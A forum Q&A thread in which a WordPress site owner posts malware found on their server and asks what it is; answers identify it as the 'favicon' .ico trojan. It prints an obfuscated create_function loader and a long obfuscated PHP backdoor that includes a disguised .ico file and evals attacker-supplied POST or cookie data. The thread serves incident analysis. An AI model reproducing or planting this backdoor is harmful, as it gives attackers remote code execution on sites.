# WordPress qw.php file on root of installation

Tags: php, wordpress, malware

I'm posting here not only to receive help or guidance on this particular file, but also to help in searching for this issue.

Apparently, the root of the installation for WordPress has a file called `qw.php` that is not part of the standard installation package.

The file contents are as follows:

```
<?php

$alphabet  =  ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string  = "Z2xvYmFsICRhdXRoX3Bhc3MsJGNvbG9yLCRkZWZhdWx0X2FjdGlvbiwkZGVmYXVsdF91$"
$array_name  =  "";
$ar  = array(4,29,34,38,42,9,21,7,38,17,37,7,38);

foreach($ar as $t){
   $array_name .= $alphabet[$t];
}

$a  =  strrev("noi"."tcnuf"."_eta"."erc");
$f  =  $a("", $array_name($string));
$f();
```

I've noticed the hacker will also go into an `index.php` file of a folder or installation, and add the following php to the top of the php file:

```
    <?php
/*e5486*/

@include "\057www\055dat\141/AN\110_US\101/pe\164iti\157nhe\162o.o\162g/w\145b/c\157nte\156t/.\066a99\07094c\056ico";

/*e5486*/                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $tc6d63f = 643;$GLOBALS['r15a0'] = Array();global $r15a0;$r15a0 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['fd7e1'] = "\x63\x4a\x52\x51\x67\x5b\x46\x41\x38\x60\x50\x65\x3e\x7b\x54\x64\x2e\x71\x2a\x75\x56\x7e\x66\x2f\x59\x3d\x6c\x76\x79\x22\x58\x37\x6f\x7a\x3b\x68\x70\x42\x6b\x49\x28\x21\x47\x23\x74\x9\x5f\x77\x4c\x6d\x24\x53\x34\x4b\x45\xd\xa\x44\x2d\x31\x61\x5a\x40\x29\x43\x6e\x57\x3a\x72\x36\x4f\x39\x62\x35\x3f\x7d\x4d\x5c\x73\x69\x26\x5e\x2b\x4e\x48\x6a\x30\x2c\x78\x33\x27\x5d\x7c\x32\x55\x20\x3c\x25";$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][22].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22].$r15a0['fd7e1'][71].$r15a0['fd7e1'][73].$r15a0['fd7e1'][0]] = $r15a0['fd7e1'][0].$r15a0['fd7e1'][35].$r15a0['fd7e1'][68];$r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]] = $r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][11].$r15a0['fd7e1'][31].$r15a0['fd7e1'][31].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72]] = $r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][22].$r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]] = $r15a0['fd7e1'][78].$r15a0['fd7e1'][44].$r15a0['fd7e1'][68].$r15a0['fd7e1'][26].$r15a0['fd7e1'][11].$r15a0['fd7e1'][65];$r15a0[$r15a0['fd7e1'][17].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][93].$r15a0['fd7e1'][73]] = $r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][22].$r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][11].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]] = $r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][79].$r15a0['fd7e1'][46].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][44];$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][89].$r15a0['fd7e1'][52].$r15a0['fd7e1'][8]] = $r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][79].$r15a0['fd7e1'][60].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][33].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][49].$r15a0['fd7e1'][52].$r15a0['fd7e1'][31].$r15a0['fd7e1'][15].$r15a0['fd7e1'][89].$r15a0['fd7e1'][72].$r15a0['fd7e1'][15]] = $r15a0['fd7e1'][36].$r15a0['fd7e1'][35].$r15a0['fd7e1'][36].$r15a0['fd7e1'][27].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][78].$r15a0['fd7e1'][79].$r15a0['fd7e1'][32].$r15a0['fd7e1'][65];$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][8].$r15a0['fd7e1'][69].$r15a0['fd7e1'][11].$r15a0['fd7e1'][89].$r15a0['fd7e1'][71].$r15a0['fd7e1'][71].$r15a0['fd7e1'][31].$r15a0['fd7e1'][93]] = $r15a0['fd7e1'][19].$r15a0['fd7e1'][65].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][79].$r15a0['fd7e1'][60].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][33].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][52].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][0].$r15a0['fd7e1'][8].$r15a0['fd7e1'][89].$r15a0['fd7e1'][31]] = $r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][69].$r15a0['fd7e1'][52].$r15a0['fd7e1'][46].$r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][0].$r15a0['fd7e1'][32].$r15a0['fd7e1'][15].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][72].$r15a0['fd7e1'][72].$r15a0['fd7e1'][73]] = $r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][44].$r15a0['fd7e1'][46].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][11].$r15a0['fd7e1'][46].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][79].$r15a0['fd7e1'][44];$r15a0[$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][73].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][15]] = $r15a0['fd7e1'][68].$r15a0['fd7e1'][52].$r15a0['fd7e1'][22].$r15a0['fd7e1'][0].$r15a0['fd7e1'][11].$r15a0['fd7e1'][86].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]] = $r15a0['fd7e1'][44].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72].$r15a0['fd7e1'][89].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][32].$r15a0['fd7e1'][93].$r15a0['fd7e1'][86].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8]] = $_POST;$r15a0[$r15a0['fd7e1'][26].$r15a0['fd7e1'][71].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][0]] = $_COOKIE;@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][68].$r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][46].$r15a0['fd7e1'][26].$r15a0['fd7e1'][32].$r15a0['fd7e1'][4], NULL);@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][26].$r15a0['fd7e1'][32].$r15a0['fd7e1'][4].$r15a0['fd7e1'][46].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][68].$r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][78], 0);@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][49].$r15a0['fd7e1'][60].$r15a0['fd7e1'][88].$r15a0['fd7e1'][46].$r15a0['fd7e1'][11].$r15a0['fd7e1'][88].$r15a0['fd7e1'][11].$r15a0['fd7e1'][0].$r15a0['fd7e1'][19].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][32].$r15a0['fd7e1'][65].$r15a0['fd7e1'][46].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][11], 0);@$r15a0[$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][72].$r15a0['fd7e1'][72].$r15a0['fd7e1'][73]](0);if (!$r15a0[$r15a0['fd7e1'][17].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][93].$r15a0['fd7e1'][73]]($r15a0['fd7e1'][7].$r15a0['fd7e1'][48].$r15a0['fd7e1'][2].$r15a0['fd7e1'][54].$r15a0['fd7e1'][7].$r15a0['fd7e1'][57].$r15a0['fd7e1'][24].$r15a0['fd7e1'][46].$r15a0['fd7e1'][2].$r15a0['fd7e1'][94].$r15a0['fd7e1'][83].$r15a0['fd7e1'][46].$r15a0['fd7e1'][89].$r15a0['fd7e1'][69].$r15a0['fd7e1'][69].$r15a0['fd7e1'][60].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][93].$r15a0['fd7e1'][89].$r15a0['fd7e1'][73].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][59].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][22].$r15a0['fd7e1'][59].$r15a0['fd7e1'][59].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][59].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60])){$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][11].$r15a0['fd7e1'][31].$r15a0['fd7e1'][31].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72]]($r15a0['fd7e1'][7].$r15a0['fd7e1'][48].$r15a0['fd7e1'][2].$r15a0['fd7e1'][54].$r15a0['fd7e1'][7].$r15a0['fd7e1'][57].$r15a0['fd7e1'][24].$r15a0['fd7e1'][46].$r15a0['fd7e1'][2].$r15a0['fd7e1'][94].$r15a0['fd7e1'][83].$r15a0['fd7e1'][46].$r15a0['fd7e1'][89].$r15a0['fd7e1'][69].$r15a0['fd7e1'][69].$r15a0['fd7e1'][60].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][93].$r15a0['fd7e1'][89].$r15a0['fd7e1'][73].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][59].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][22].$r15a0['fd7e1'][59].$r15a0['fd7e1'][59].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][59].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60], 1);$fd2e3658 = NULL;$l055f1e = NULL;$r15a0[$r15a0['fd7e1'][78].$r15a0['fd7e1'][31].$r15a0['fd7e1'][59].$r15a0['fd7e1'][93].$r15a0['fd7e1'][0].$r15a0['fd7e1'][52]] = $r15a0['fd7e1'][73].$r15a0['fd7e1'][52].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][58].$r15a0['fd7e1'][52].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][22].$r15a0['fd7e1'][58].$r15a0['fd7e1'][52].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][58].$r15a0['fd7e1'][8].$r15a0['fd7e1'][73].$r15a0['fd7e1'][8].$r15a0['fd7e1'][22].$r15a0['fd7e1'][58].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][69].$r15a0['fd7e1'][0].$r15a0['fd7e1'][31].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][59].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22];global $s712c4;function  t4b3d($fd2e3658, $h0025d){global $r15a0;$abe6301 = "";for ($x3b1d62=0; $x3b1d62<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($fd2e3658);){for ($pb0b59=0; $pb0b59<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($h0025d) && $x3b1d62<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($fd2e3658); $pb0b59++, $x3b1d62++){$abe6301 .= $r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][22].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22].$r15a0['fd7e1'][71].$r15a0['fd7e1'][73].$r15a0['fd7e1'][0]]($r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]]($fd2e3658[$x3b1d62]) ^ $r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]]($h0025d[$pb0b59]));}}return $abe6301;}function  r4fce08d($fd2e3658, $h0025d){global $r15a0;global $s712c4;return $r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]]($r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]]($fd2e3658, $s712c4), $h0025d);}foreach ($r15a0[$r15a0['fd7e1'][26].$r15a0['fd7e1'][71].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][0]] as $h0025d=>$n9121){$fd2e3658 = $n9121;$l055f1e = $h0025d;}if (!$fd2e3658){foreach ($r15a0[$r15a0['fd7e1'][32].$r15a0['fd7e1'][93].$r15a0['fd7e1'][86].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8]] as $h0025d=>$n9121){$fd2e3658 = $n9121;$l055f1e = $h0025d;}}$fd2e3658 = @$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][8].$r15a0['fd7e1'][69].$r15a0['fd7e1'][11].$r15a0['fd7e1'][89].$r15a0['fd7e1'][71].$r15a0['fd7e1'][71].$r15a0['fd7e1'][31].$r15a0['fd7e1'][93]]($r15a0[$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][73].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][15]]($r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][52].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][0].$r15a0['fd7e1'][8].$r15a0['fd7e1'][89].$r15a0['fd7e1'][31]]($fd2e3658), $l055f1e));if (isset($fd2e3658[$r15a0['fd7e1'][60].$r15a0['fd7e1'][38]]) && $s712c4==$fd2e3658[$r15a0['fd7e1'][60].$r15a0['fd7e1'][38]]){if ($fd2e3658[$r15a0['fd7e1'][60]] == $r15a0['fd7e1'][79]){$x3b1d62 = Array($r15a0['fd7e1'][36].$r15a0['fd7e1'][27] => @$r15a0[$r15a0['fd7e1'][49].$r15a0['fd7e1'][52].$r15a0['fd7e1'][31].$r15a0['fd7e1'][15].$r15a0['fd7e1'][89].$r15a0['fd7e1'][72].$r15a0['fd7e1'][15]](),$r15a0['fd7e1'][78].$r15a0['fd7e1'][27] => $r15a0['fd7e1'][59].$r15a0['fd7e1'][16].$r15a0['fd7e1'][86].$r15a0['fd7e1'][58].$r15a0['fd7e1'][59],);echo @$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][89].$r15a0['fd7e1'][52].$r15a0['fd7e1'][8]]($x3b1d62);}elseif ($fd2e3658[$r15a0['fd7e1'][60]] == $r15a0['fd7e1'][11]){eval/*k59bce*/($fd2e3658[$r15a0['fd7e1'][15]]);}exit();}} ?>
```

Additional files added to the server installation root: `article59.php`, `dir44.php`, `onxwylrq.php`

Any thoughts on what this is related to in terms of malware? Does anyone know what this file connects to in terms of a hacked plugin or theme location?

Comment: Dodgy, remove it. WP does not have a file like this in any of it's folder structure.

Comment: Not sure what it's trying to achieve though... is that all of it?  Doesn't look like it's doing anything particularly worrying... but still dodgy none the less

Comment: $a = erc_etatcnufnoi ... weird. Definitely not something I'd keep on my server.

Comment: As investigation, try to see if there is an additional script including this.

Comment: Your reversing got reversed @Dammeul (it's `create_function`)

Comment: Hahaha damn... I got proper confused as to what it was doing with $array_name($string) but that makes more sense now... any idea what it's trying to do (if anything)?

Comment: in an effort to find a solution for this i've added additional reference in my OP regarding further malicious code added to an index.php in a directory

Answer (score 1):

It looks like your website is infected by the favicon trojan as the first line of that script evaluate to:

```
@include "/www-data/ANH_USA/petitionhero.org/web/content/.6a99894c.ico"
```

> The favicon (.ico) malware creates rogue favicon.ico or random .ico
>   files which contain malicious PHP code inside them. This malicious PHP
>   code is known to perform dangerous actions on the websites such as URL
>   injection, creation of adminisrator accouns in WordPress/Drupal,
>   installing spyware/trojans, creating phishing pages etc.

Check more details [here](https://www.getastra.com/e/malware/infections/favicon-ico-malware-backdoor-in-wordpress-drupal).